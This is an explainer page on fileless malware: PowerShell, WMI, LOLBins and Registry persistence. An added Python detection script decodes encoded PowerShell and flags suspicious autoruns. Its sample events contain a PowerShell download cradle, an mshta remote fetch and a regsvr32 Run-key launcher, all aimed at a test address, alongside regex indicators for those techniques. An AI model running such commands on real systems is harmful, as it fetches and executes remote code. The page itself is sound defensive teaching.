ELI5: What is Fileless Malware?
Most bad software leaves files behind, like muddy footprints. Fileless malware lives only in the computer’s short-term memory and uses the computer’s own tools to do harm, leaving almost no trace.
Definition
Fileless malware is malicious code whose payload runs in a system's memory (RAM) instead of being written to disk as an executable file. It is typically launched through legitimate built-in components (PowerShell, WMI (Windows Management Instrumentation), the Windows Registry, or scheduled tasks) and arrives as a script, a command line, or an encoded blob that is decoded and executed in memory. Because there is no executable on disk to scan, signature-based antivirus that inspects files has nothing to match against. The "fileless" label describes the payload: the launcher or persistence entry usually still leaves a small artifact on disk (a Registry value, a WMI subscription, a task definition), and that artifact is where defenders look.
Key Details
- Lives in memory: the payload disappears at reboot, which frustrates post-mortem disk forensics but also forces the attacker to establish persistence elsewhere (or re-infect) to survive a restart.
- Common techniques: PowerShell command execution (often with -EncodedCommand and obfuscation), WMI event subscriptions, reflective DLL injection (loading a DLL from memory without writing it to disk), living off the land (LOLBins).
- LOLBins (Living Off the Land Binaries): legitimate, Microsoft-signed Windows tools (certutil.exe, mshta.exe, regsvr32.exe) abused to download, decode, or execute payloads. Because they are signed and present on every host, binary allowlisting and file reputation alone do not stop them; the command line and process lineage are what give them away.
- Persistence mechanisms: Registry Run keys, WMI subscriptions, scheduled tasks. These do touch disk, but what they store is a short launcher (a command line or an encoded script), not the payload, which is rebuilt in memory each time the launcher fires.
- Detection requires behavioral analysis (EDR watching process lineage and command lines), PowerShell Script Block Logging (Event ID 4104 in the PowerShell Operational log, which records the de-obfuscated script text) together with AMSI, auditing of Registry autorun and WMI subscription changes (for example Sysmon Event IDs 13 and 19 to 21), and memory forensics of live systems rather than disk images.
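The checks described above, as an added example that is not part of the original page: a small Python triage routine of the kind an EDR or SIEM rule would run over process-creation command lines and Registry autorun writes. It decodes PowerShell -EncodedCommand payloads (base64 over UTF-16LE), matches a handful of fileless indicators against the decoded script, and flags Run-key values whose data launches a script interpreter or LOLBin instead of a normal program. The event records, the indicator list, the alert threshold, and the hosts (RFC 5737 test range) are all constructed for the example.

```python
import base64
import re

# Constructed sample (not real telemetry): records shaped like Security 4688 / Sysmon 1
# (process creation with command line) and Sysmon 13 (Registry value set).
INTERPRETERS = ("powershell", "pwsh", "cmd", "wscript", "cscript")
LOLBINS = ("mshta", "regsvr32", "certutil", "rundll32")

# Indicators are matched against the lower-cased command line plus any decoded payload.
INDICATORS = [
    ("invoke-expression", r"\biex\b|invoke-expression"),
    ("download-cradle",   r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"),
    ("base64-payload",    r"frombase64string"),
    ("reflective-load",   r"\[(?:system\.)?reflection\.assembly\]::load"),
    ("hidden-window",     r"-w(?:indowstyle)?\s+hidden"),
    ("no-profile",        r"-nop\b|-noprofile\b"),
    ("remote-url",        r"https?://"),
    ("lolbin",            r"\b(?:" + "|".join(LOLBINS) + r")(?:\.exe)?\b"),
]
RUN_KEY_RE = re.compile(r"\\currentversion\\run(?:once)?\\", re.I)


def encode_powershell(script: str) -> str:
    """What PowerShell expects after -EncodedCommand; used only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_command(cmdline: str):
    """Return the argument of -EncodedCommand, accepting the abbreviations PowerShell
    itself accepts (-e, -en, -enc, ... and -ec), or None if there is none."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if t == "-ec" or (len(t) >= 2 and "-encodedcommand".startswith(t)):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64: str):
    """Decode base64/UTF-16LE; None if the token is not a real payload (e.g. the value
    following -ExecutionPolicy, which the prefix rule above would otherwise accept)."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Decode any encoded payload, then match INDICATORS against the visible command line
    and the decoded script. The raw base64 is masked so it cannot produce false hits."""
    hits, decoded, visible = [], None, cmdline
    b64 = extract_encoded_command(cmdline)
    if b64:
        decoded = decode_encoded_command(b64)
        if decoded is not None:
            hits.append("encoded-command")
            visible = cmdline.replace(b64, "<encoded>")
    text = (visible + "\n" + (decoded or "")).lower()
    hits += [name for name, pat in INDICATORS if re.search(pat, text)]
    # Example threshold: two independent indicators. A lone LOLBin or URL is admin noise.
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 2}


def analyze_registry_write(target: str, data: str) -> dict:
    """A Run/RunOnce value that launches an interpreter or LOLBin is the on-disk stub of a
    fileless chain: the payload is fetched or decoded at logon, not stored here."""
    hits = []
    if RUN_KEY_RE.search(target):
        hits.append("run-key")
        names = INTERPRETERS + LOLBINS
        if any(re.search(r"\b" + n + r"(?:\.exe)?\b", data.lower()) for n in names):
            hits.append("interpreter-autorun")
        hits += [h for h in analyze_command_line(data)["indicators"] if h not in hits]
    return {"indicators": hits, "suspicious": "interpreter-autorun" in hits}


def scan(events) -> list:
    """Return (event id, indicators) for every record that crosses the threshold."""
    alerts = []
    for ev in events:
        if "cmdline" in ev:
            result = analyze_command_line(ev["cmdline"])
        else:
            result = analyze_registry_write(ev["target"], ev["data"])
        if result["suspicious"]:
            alerts.append((ev["id"], result["indicators"]))
    return alerts


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/p.ps1')"
SAMPLE_EVENTS = [  # constructed records
    {"id": 4688, "cmdline": "powershell.exe -nop -w hidden -enc " + encode_powershell(CRADLE)},
    {"id": 4688, "cmdline": "powershell.exe -ExecutionPolicy Unrestricted -Command Get-Service"},
    {"id": 4688, "cmdline": "mshta.exe http://192.0.2.10/x.hta"},
    {"id": 13, "target": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": "regsvr32.exe /s /n /u /i:http://192.0.2.10/a.sct scrobj.dll"},
    {"id": 13, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "data": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

if __name__ == "__main__":
    for event_id, indicators in scan(SAMPLE_EVENTS):
        print(event_id, ", ".join(indicators))
```

The point of the decode step is that the visible command line of the first record contains nothing a file signature could match; only after reversing the UTF-16LE base64 does the download cradle appear. The two benign records (an administrator's Get-Service and a real OneDrive autorun) pass, while the Run-key entry is flagged not because of anything on disk but because its data hands control to regsvr32.exe with a remote URL.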
Connections
- Parent: malware-types — an advanced evasion-focused malware category
- See also: polymorphic-malware